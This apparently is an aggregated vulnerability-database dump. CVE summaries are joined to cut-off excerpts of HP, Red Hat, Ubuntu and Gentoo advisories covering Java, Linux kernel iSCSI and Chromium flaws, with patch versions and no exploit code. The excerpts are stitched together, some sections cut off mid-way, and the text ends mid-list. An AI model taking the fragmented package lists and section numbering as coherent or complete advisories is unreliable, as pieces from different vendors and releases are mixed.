2Vxd3euXYwySD6qDCYNLJ0hUKu90c/4nr5d5rRH3xYdBzAHuZG39m069lpN1UZIW t5ube+j9zjiejnXlPbAgq+vIAg22nu0EdxhOOZZeQOoEYqyoKhXNCt3fR+tzo3o4 mN/LWMO1NwrM0sGDPuUGs2TWdPZbC4QJJz4Z4S+FsTlujYh9MRd3dyxLBIg7BKCL wgnFdpFW8bPmVdiTj91pC0Gb3XtolQxexXGHsdI15KeFMbQ06nKV/AyvxMF8O5jS D089GEHE52NAQCZ0YJ6TJsisrGqTZZ77js55cPU259FogxEKKBuwfdFbn4qVeD8= =4KBF -----END PGP SIGNATURE----- . Release Date: 2012-01-23 Last Updated: 2012-01-23 ------------------------------------------------------------------------------ Potential Security Impact: Remote unauthorized access, disclosure of information, and other vulnerabilities Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified in Java Runtime Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These vulnerabilities could allow remote unauthorized access, disclosure of information, and other vulnerabilities. SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 6.0.12 or earlier BACKGROUND CVSS 2.0 Base Metrics =========================================================== Reference Base Vector Base Score CVE-2011-3389 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2011-3516 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6 CVE-2011-3521 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2011-3544 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2011-3545 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2011-3546 (AV:N/AC:M/Au:N/C:P/I:P/A:N) 5.8 CVE-2011-3547 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2011-3548 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2011-3549 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2011-3550 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6 CVE-2011-3551 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2011-3552 (AV:N/AC:H/Au:N/C:N/I:P/A:N) 2.6 CVE-2011-3553 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5 CVE-2011-3554 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2011-3556 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2011-3557 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2011-3558 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2011-3560 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2011-3561 (AV:A/AC:H/Au:N/C:P/I:N/A:N) 1.8 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has provided the following Java version upgrades to resolve these vulnerabilities. This bulletin will be revised as other upgrades for additional supported Java versions become available. The upgrades are available from the following location http://www.hp.com/go/java HP-UX B.11.11, B.11.23, B.11.31 JDK and JRE v6.0.13 or subsequent MANUAL ACTIONS: Yes - Update For Java v6.0.12 and earlier, update to Java v6.0.13 or subsequent PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa The following text is for use by the HP-UX Software Assistant. AFFECTED VERSIONS HP-UX B.11.11 HP-UX B.11.23 HP-UX B.11.31 =========== Jre60.JRE60-COM Jre60.JRE60-IPF32 Jre60.JRE60-IPF32-HS Jre60.JRE60-IPF64 Jre60.JRE60-IPF64-HS Jre60.JRE60-PA20 Jre60.JRE60-PA20-HS Jre60.JRE60-PA20W Jre60.JRE60-PA20W-HS Jdk60.JDK60-COM Jdk60.JDK60-IPF32 Jdk60.JDK60-IPF64 Jdk60.JDK60-PA20 Jdk60.JDK60-PA20W action: install revision 1.6.0.13.00 or subsequent END AFFECTED VERSIONS HISTORY Version:1 (rev.1) 23 January 2012 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners
var-202103-0920 An issue was discovered in the Linux kernel through 5.11.3. A kernel pointer leak can be used to determine the address of the iscsi_transport structure. When an iSCSI transport is registered with the iSCSI subsystem, the transport's handle is available to unprivileged users via the sysfs file system, at /sys/class/iscsi_transport/$TRANSPORT_NAME/handle. When read, the show_transport_handle function (in drivers/scsi/scsi_transport_iscsi.c) is called, which leaks the handle. This handle is actually the pointer to an iscsi_transport struct in the kernel module's global variables. Linux Kernel Contains an unspecified vulnerability.Information is obtained and denial of service (DoS) It may be put into a state. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ===================================================================== Red Hat Security Advisory Synopsis: Important: kernel security and bug fix update Advisory ID: RHSA-2021:1267-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2021:1267 Issue date: 2021-04-20 CVE Names: CVE-2020-14351 CVE-2021-27363 CVE-2021-27364 CVE-2021-27365 ===================================================================== 1. Summary: An update for kernel is now available for Red Hat Enterprise Linux 7.4 Advanced Update Support, Red Hat Enterprise Linux 7.4 Telco Extended Update Support, and Red Hat Enterprise Linux 7.4 Update Services for SAP Solutions. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Server AUS (v. 7.4) - noarch, x86_64 Red Hat Enterprise Linux Server E4S (v. 7.4) - noarch, ppc64le, x86_64 Red Hat Enterprise Linux Server Optional AUS (v. 7.4) - x86_64 Red Hat Enterprise Linux Server Optional E4S (v. 7.4) - ppc64le, x86_64 Red Hat Enterprise Linux Server Optional TUS (v. 7.4) - x86_64 Red Hat Enterprise Linux Server TUS (v. 7.4) - noarch, x86_64 3. Security Fix(es): * kernel: out-of-bounds read in libiscsi module (CVE-2021-27364) * kernel: heap buffer overflow in the iSCSI subsystem (CVE-2021-27365) * kernel: performance counters race condition use-after-free (CVE-2020-14351) * kernel: iscsi: unrestricted access to sessions and handles (CVE-2021-27363) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Bug Fix(es): * Enable CI and changelog for GitLab workflow (BZ#1930932) 4. Solution: For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 The system must be rebooted for this update to take effect. 5. Bugs fixed (https://bugzilla.redhat.com/): 1862849 - CVE-2020-14351 kernel: performance counters race condition use-after-free 1930078 - CVE-2021-27365 kernel: heap buffer overflow in the iSCSI subsystem 1930079 - CVE-2021-27363 kernel: iscsi: unrestricted access to sessions and handles 1930080 - CVE-2021-27364 kernel: out-of-bounds read in libiscsi module 6. Package List: Red Hat Enterprise Linux Server AUS (v. 7.4): Source: kernel-3.10.0-693.84.1.el7.src.rpm noarch: kernel-abi-whitelists-3.10.0-693.84.1.el7.noarch.rpm kernel-doc-3.10.0-693.84.1.el7.noarch.rpm x86_64: kernel-3.10.0-693.84.1.el7.x86_64.rpm kernel-debug-3.10.0-693.84.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-693.84.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-693.84.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-693.84.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-693.84.1.el7.x86_64.rpm kernel-devel-3.10.0-693.84.1.el7.x86_64.rpm kernel-headers-3.10.0-693.84.1.el7.x86_64.rpm kernel-tools-3.10.0-693.84.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-693.84.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-693.84.1.el7.x86_64.rpm perf-3.10.0-693.84.1.el7.x86_64.rpm perf-debuginfo-3.10.0-693.84.1.el7.x86_64.rpm python-perf-3.10.0-693.84.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-693.84.1.el7.x86_64.rpm Red Hat Enterprise Linux Server E4S (v. 7.4): Source: kernel-3.10.0-693.84.1.el7.src.rpm noarch: kernel-abi-whitelists-3.10.0-693.84.1.el7.noarch.rpm kernel-doc-3.10.0-693.84.1.el7.noarch.rpm ppc64le: kernel-3.10.0-693.84.1.el7.ppc64le.rpm kernel-bootwrapper-3.10.0-693.84.1.el7.ppc64le.rpm kernel-debug-3.10.0-693.84.1.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-693.84.1.el7.ppc64le.rpm kernel-debuginfo-3.10.0-693.84.1.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-693.84.1.el7.ppc64le.rpm kernel-devel-3.10.0-693.84.1.el7.ppc64le.rpm kernel-headers-3.10.0-693.84.1.el7.ppc64le.rpm kernel-tools-3.10.0-693.84.1.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-693.84.1.el7.ppc64le.rpm kernel-tools-libs-3.10.0-693.84.1.el7.ppc64le.rpm perf-3.10.0-693.84.1.el7.ppc64le.rpm perf-debuginfo-3.10.0-693.84.1.el7.ppc64le.rpm python-perf-3.10.0-693.84.1.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-693.84.1.el7.ppc64le.rpm x86_64: kernel-3.10.0-693.84.1.el7.x86_64.rpm kernel-debug-3.10.0-693.84.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-693.84.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-693.84.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-693.84.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-693.84.1.el7.x86_64.rpm kernel-devel-3.10.0-693.84.1.el7.x86_64.rpm kernel-headers-3.10.0-693.84.1.el7.x86_64.rpm kernel-tools-3.10.0-693.84.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-693.84.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-693.84.1.el7.x86_64.rpm perf-3.10.0-693.84.1.el7.x86_64.rpm perf-debuginfo-3.10.0-693.84.1.el7.x86_64.rpm python-perf-3.10.0-693.84.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-693.84.1.el7.x86_64.rpm Red Hat Enterprise Linux Server TUS (v. 7.4): Source: kernel-3.10.0-693.84.1.el7.src.rpm noarch: kernel-abi-whitelists-3.10.0-693.84.1.el7.noarch.rpm kernel-doc-3.10.0-693.84.1.el7.noarch.rpm x86_64: kernel-3.10.0-693.84.1.el7.x86_64.rpm kernel-debug-3.10.0-693.84.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-693.84.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-693.84.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-693.84.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-693.84.1.el7.x86_64.rpm kernel-devel-3.10.0-693.84.1.el7.x86_64.rpm kernel-headers-3.10.0-693.84.1.el7.x86_64.rpm kernel-tools-3.10.0-693.84.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-693.84.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-693.84.1.el7.x86_64.rpm perf-3.10.0-693.84.1.el7.x86_64.rpm perf-debuginfo-3.10.0-693.84.1.el7.x86_64.rpm python-perf-3.10.0-693.84.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-693.84.1.el7.x86_64.rpm Red Hat Enterprise Linux Server Optional AUS (v. 7.4): x86_64: kernel-debug-debuginfo-3.10.0-693.84.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-693.84.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-693.84.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-693.84.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-693.84.1.el7.x86_64.rpm perf-debuginfo-3.10.0-693.84.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-693.84.1.el7.x86_64.rpm Red Hat Enterprise Linux Server Optional E4S (v. 7.4): ppc64le: kernel-debug-debuginfo-3.10.0-693.84.1.el7.ppc64le.rpm kernel-debug-devel-3.10.0-693.84.1.el7.ppc64le.rpm kernel-debuginfo-3.10.0-693.84.1.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-693.84.1.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-693.84.1.el7.ppc64le.rpm kernel-tools-libs-devel-3.10.0-693.84.1.el7.ppc64le.rpm perf-debuginfo-3.10.0-693.84.1.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-693.84.1.el7.ppc64le.rpm x86_64: kernel-debug-debuginfo-3.10.0-693.84.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-693.84.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-693.84.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-693.84.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-693.84.1.el7.x86_64.rpm perf-debuginfo-3.10.0-693.84.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-693.84.1.el7.x86_64.rpm Red Hat Enterprise Linux Server Optional TUS (v. 7.4): x86_64: kernel-debug-debuginfo-3.10.0-693.84.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-693.84.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-693.84.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-693.84.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-693.84.1.el7.x86_64.rpm perf-debuginfo-3.10.0-693.84.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-693.84.1.el7.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2020-14351 https://access.redhat.com/security/cve/CVE-2021-27363 https://access.redhat.com/security/cve/CVE-2021-27364 https://access.redhat.com/security/cve/CVE-2021-27365 https://access.redhat.com/security/updates/classification/#important 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBYH7PN9zjgjWX9erEAQj00Q//dwJUA3XoZ8Ferzd26sJ/DcX6mUEUBmHR ak7tX27vETn/72UdgkHJkB0XRqsn6yjQBdowxXQe7zdcmnPFemMlluDzwNnNw2ME FqLcIPgWI7qct32+csGDvOfUDz912A+Sc9XB2oekMpXgeMunfxz3FfmocZPVKcqh OJq9MTkjJcktHOKvwr40xnYKk/0cKUqcjqQxGZbYCr0RZ3u88vHd8JIDZqmBr+dk tYHIs5lIZ2jICescQf9nwQByB4jm8BX7WDqmdyvV8jrrRzVYhLyFZdDDo9nosDVK 4y++m9pLVqHtkojPscbn2+NBEDHJxUmtFn5JabSLb51Jog0tGu+QC5MEtfqc5jgH Cn/M47TR6OiB88i8FdQva40HWGsEQanZaLeNWRGEh+AaVZt0WD7zgzAbKghZ8iLY EypWscF8RYcEN27Q6DNcWwozLyfWGbH3Sex4OMsPL1jqtki0+6HD/ezI6HDmnHy0 4FuCbavgKBRuHHZXG7jX/rN6FHMg/7My4LSHk9fmj2PszaTyZZpFqz0mcBCMJzNX rbgPNtvbOpjv4sUn22LNNA77lOGw+cKwXIU0FKwDBXx+Ak7riGn2l6OpTReUa3qj Eck9dxJiZAzSNunG9HN8dBXUprcuo2WYJ4TV+KwxCLQbQbOkrnHD6bSHXRv70bxK HUMRmNWYCrM= =INXh -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Description: Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. See the following advisory for the container images for this release: https://access.redhat.com/errata/RHBA-2021:1427 All OpenShift Container Platform 4.6 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift Console or the CLI oc command. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.6/updating/updating-cluster - -between-minor.html#understanding-upgrade-channels_updating-cluster-between - -minor 3. Solution: For OpenShift Container Platform 4.6 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update: https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-rel ease-notes.html Details on how to access this content are available at https://docs.openshift.com/container-platform/4.6/updating/updating-cluster - -cli.html 4. Bugs fixed (https://bugzilla.redhat.com/): 1887664 - CVE-2020-25649 jackson-databind: FasterXML DOMDeserializer insecure entity expansion is vulnerable to XML external entity (XXE) 1941768 - Reports that has specified a retention should not be requeued in the sync handler 1954163 - Placeholder bug for OCP 4.6.0 extras release 5. Description: The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Bug Fix(es): * RHEL7.9 Realtime crashes due to a blocked task detection. The blocked task is stuck in unregister_shrinker() where multiple tasks have taken the shrinker_rwsem and are fighting on a dentry's d_lockref lock rt_mutex. [kernel-rt] (BZ#1935557) * kernel-rt: update to the latest RHEL7.9.z5 source tree (BZ#1939220) 4. 8) - x86_64 3. 8) - aarch64, noarch, ppc64le, s390x, x86_64 3. Bug Fix(es): * race condition when creating child sockets from syncookies (BZ#1915529) * On System Z, a hash needs state randomized for entropy extraction (BZ#1915816) * scsi: target: core_tmr_abort_task() reporting multiple aborts for the same se_cmd->tag (BZ#1918354) * [mlx5] VF interface stats are not reflected in "ip -s link show" / "ifconfig <vf>" commands (BZ#1921060) * Win10 guest automatic reboot after migration in Win10 and WSL2 on Intel hosts (BZ#1923281) * [RHEL 8.3] Repeated messages - Unable to burst-read optrom segment (BZ#1924222) * Backport bug fix RDMA/umem: Prevent small pages from being returned by ib_umem_find_best_pgsz (BZ#1924691) * [Cisco 8.3] RHEL/Cent 8.2 fNIC driver needs a patch fix that addresses crash (BZ#1925186) * RHEL8.3 - The kernel misdetects zCX with z/VM (BZ#1925508) * Backport 22e4663e91 ("mm/slub: fix panic in slab_alloc_node()") (BZ#1925511) * SCTP "Address already in use" when no active endpoints from RHEL 8.2 onwards (BZ#1927521) * lpfc: Fix initial FLOGI failure due to BBSCN not supported (BZ#1927921) * [mm] mm, oom: remove oom_lock from oom_reaper (BZ#1929738) * Unexpected thread movement with AMD Milan compared to Rome (BZ#1929740) * rpmbuild cannot build the userspace RPMs in the kernel package when the kernel itself is not built (BZ#1929910) * [Regression] RHEL8.2 - ISST-LTE:pVM:diapvmlp83:sum:memory DLPAR fails to add memory on multiple trials[mm/memory_hotplug.c:1163] (mm-) (BZ#1930168) * Configuring the system with non-RT kernel will hang the system (BZ#1930735) * Upstream Patch for Gracefully handle DMAR units with no supported address widthsx86/vt-d (BZ#1932199) * gfs2: Deadlock between gfs2_{create_inode,inode_lookup} and delete_work_func (BZ#1937109) * Failing on tsx-ctrl when the flag doesn't change anything (BZ#1939013) Enhancement(s): * RFE: Backport all Audit enhancements and fixes up to version 5.10-rc1 (BZ#1907520) * RHEL8.4: Update the target driver (BZ#1918363) * [Mellanox 8.4 FEAT] mlx5: Hairpin Support in Switch Mode (BZ#1924689) 4. ========================================================================== Ubuntu Security Notice USN-4883-1 March 20, 2021 linux, linux-aws, linux-aws-hwe, linux-azure, linux-azure-4.15, linux-gcp, linux-gcp-4.15, linux-hwe, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 18.04 LTS - Ubuntu 16.04 LTS - Ubuntu 14.04 ESM Summary: Several security issues were fixed in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-27365) Adam Nichols discovered that the iSCSI subsystem in the Linux kernel did not properly restrict access to iSCSI transport handles. A local attacker could use this to cause a denial of service or expose sensitive information (kernel pointer addresses). A local attacker could use this to cause a denial of service (system crash) or expose sensitive information (kernel memory). (CVE-2021-27364) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 18.04 LTS: linux-image-4.15.0-1081-raspi2 4.15.0-1081.86 linux-image-4.15.0-1087-kvm 4.15.0-1087.89 linux-image-4.15.0-1095-gcp 4.15.0-1095.108 linux-image-4.15.0-1096-aws 4.15.0-1096.103 linux-image-4.15.0-1098-snapdragon 4.15.0-1098.107 linux-image-4.15.0-1110-azure 4.15.0-1110.122 linux-image-4.15.0-139-generic 4.15.0-139.143 linux-image-4.15.0-139-generic-lpae 4.15.0-139.143 linux-image-4.15.0-139-lowlatency 4.15.0-139.143 linux-image-aws-lts-18.04 4.15.0.1096.99 linux-image-azure-lts-18.04 4.15.0.1110.83 linux-image-gcp-lts-18.04 4.15.0.1095.113 linux-image-generic 4.15.0.139.126 linux-image-generic-lpae 4.15.0.139.126 linux-image-kvm 4.15.0.1087.83 linux-image-lowlatency 4.15.0.139.126 linux-image-powerpc-e500mc 4.15.0.139.126 linux-image-powerpc-smp 4.15.0.139.126 linux-image-powerpc64-emb 4.15.0.139.126 linux-image-powerpc64-smp 4.15.0.139.126 linux-image-raspi2 4.15.0.1081.78 linux-image-snapdragon 4.15.0.1098.101 linux-image-virtual 4.15.0.139.126 Ubuntu 16.04 LTS: linux-image-4.15.0-1095-gcp 4.15.0-1095.108~16.04.1 linux-image-4.15.0-1096-aws 4.15.0-1096.103~16.04.1 linux-image-4.15.0-1110-azure 4.15.0-1110.122~16.04.1 linux-image-4.15.0-139-generic 4.15.0-139.143~16.04.1 linux-image-4.15.0-139-generic-lpae 4.15.0-139.143~16.04.1 linux-image-4.15.0-139-lowlatency 4.15.0-139.143~16.04.1 linux-image-4.4.0-1090-kvm 4.4.0-1090.99 linux-image-4.4.0-1124-aws 4.4.0-1124.138 linux-image-4.4.0-1152-snapdragon 4.4.0-1152.162 linux-image-4.4.0-206-generic 4.4.0-206.238 linux-image-4.4.0-206-generic-lpae 4.4.0-206.238 linux-image-4.4.0-206-lowlatency 4.4.0-206.238 linux-image-4.4.0-206-powerpc-e500mc 4.4.0-206.238 linux-image-4.4.0-206-powerpc-smp 4.4.0-206.238 linux-image-4.4.0-206-powerpc64-emb 4.4.0-206.238 linux-image-4.4.0-206-powerpc64-smp 4.4.0-206.238 linux-image-aws 4.4.0.1124.129 linux-image-aws-hwe 4.15.0.1096.89 linux-image-azure 4.15.0.1110.101 linux-image-azure-edge 4.15.0.1110.101 linux-image-gcp 4.15.0.1095.96 linux-image-generic 4.4.0.206.212 linux-image-generic-hwe-16.04 4.15.0.139.134 linux-image-generic-lpae 4.4.0.206.212 linux-image-generic-lpae-hwe-16.04 4.15.0.139.134 linux-image-gke 4.15.0.1095.96 linux-image-kvm 4.4.0.1090.88 linux-image-lowlatency 4.4.0.206.212 linux-image-lowlatency-hwe-16.04 4.15.0.139.134 linux-image-oem 4.15.0.139.134 linux-image-powerpc-e500mc 4.4.0.206.212 linux-image-powerpc-smp 4.4.0.206.212 linux-image-powerpc64-emb 4.4.0.206.212 linux-image-powerpc64-smp 4.4.0.206.212 linux-image-snapdragon 4.4.0.1152.144 linux-image-virtual 4.4.0.206.212 linux-image-virtual-hwe-16.04 4.15.0.139.134 Ubuntu 14.04 ESM: linux-image-4.15.0-1110-azure 4.15.0-1110.122~14.04.1 linux-image-4.4.0-1088-aws 4.4.0-1088.92 linux-image-aws 4.4.0.1088.85 linux-image-azure 4.15.0.1110.83 After a standard system update you need to reboot your computer to make all the necessary changes. ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well
var-201203-0202 The extension subsystem in Google Chrome before 17.0.963.78 does not properly handle history navigation, which allows remote attackers to execute arbitrary code by leveraging a "Universal XSS (UXSS)" issue. Google Chrome is prone to multiple security vulnerabilities. An attacker can exploit this issue to execute arbitrary script code in the context of the user running the application in order to steal cookie-based authentication credentials and other sensitive data, which may aid further attacks. Google Chrome versions prior to 17.0.963.78 are vulnerable. Google Chrome is a web browser developed by Google (Google). The vulnerability stems from the incorrect handling of the history navigation bar. ============================================================================ Ubuntu Security Notice USN-1524-1 August 08, 2012 webkit vulnerabilities ============================================================================ A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 12.04 LTS Summary: Multiple security vulnerabilities were fixed in WebKit. Software Description: - webkit: Web content engine library for GTK+ Details: A large number of security issues were discovered in the WebKit browser and JavaScript engines. Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 12.04 LTS: libjavascriptcoregtk-1.0-0 1.8.1-0ubuntu0.12.04.1 libjavascriptcoregtk-3.0-0 1.8.1-0ubuntu0.12.04.1 libwebkitgtk-1.0-0 1.8.1-0ubuntu0.12.04.1 libwebkitgtk-3.0-0 1.8.1-0ubuntu0.12.04.1 After a standard system update you need to restart your session to make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1524-1 CVE-2011-3046, CVE-2011-3050, CVE-2011-3067, CVE-2011-3068, CVE-2011-3069, CVE-2011-3071, CVE-2011-3073, CVE-2011-3074, CVE-2011-3075, CVE-2011-3078, CVE-2012-0672, CVE-2012-3615, CVE-2012-3655, CVE-2012-3656, CVE-2012-3680, https://launchpad.net/bugs/1027283 Package Information: https://launchpad.net/ubuntu/+source/webkit/1.8.1-0ubuntu0.12.04.1 . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201203-19 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Chromium: Multiple vulnerabilities Date: March 25, 2012 Bugs: #406975, #407465, #407755, #409251 ID: 201203-19 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been reported in Chromium, some of which may allow execution of arbitrary code. Background ========== Chromium is an open source web browser project. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 www-client/chromium < 17.0.963.83 >= 17.0.963.83 Description =========== Multiple vulnerabilities have been discovered in Chromium. Please review the CVE identifiers and release notes referenced below for details. Impact ====== A remote attacker could entice a user to open a specially crafted web site using Chromium, possibly resulting in the execution of arbitrary code with the privileges of the process, a Denial of Service condition, Universal Cross-Site Scripting, or installation of an extension without user interaction. A remote attacker could also entice a user to install a specially crafted extension that would interfere with browser-issued web requests. Workaround ========== There is no known workaround at this time. Resolution ========== All Chromium users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-client/chromium-17.0.963.83" References ========== [ 1 ] CVE-2011-3031 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3031 [ 2 ] CVE-2011-3032 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3032 [ 3 ] CVE-2011-3033 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3033 [ 4 ] CVE-2011-3034 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3034 [ 5 ] CVE-2011-3035 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3035 [ 6 ] CVE-2011-3036 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3036 [ 7 ] CVE-2011-3037 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3037 [ 8 ] CVE-2011-3038 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3038 [ 9 ] CVE-2011-3039 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3039 [ 10 ] CVE-2011-3040 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3040 [ 11 ] CVE-2011-3041 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3041 [ 12 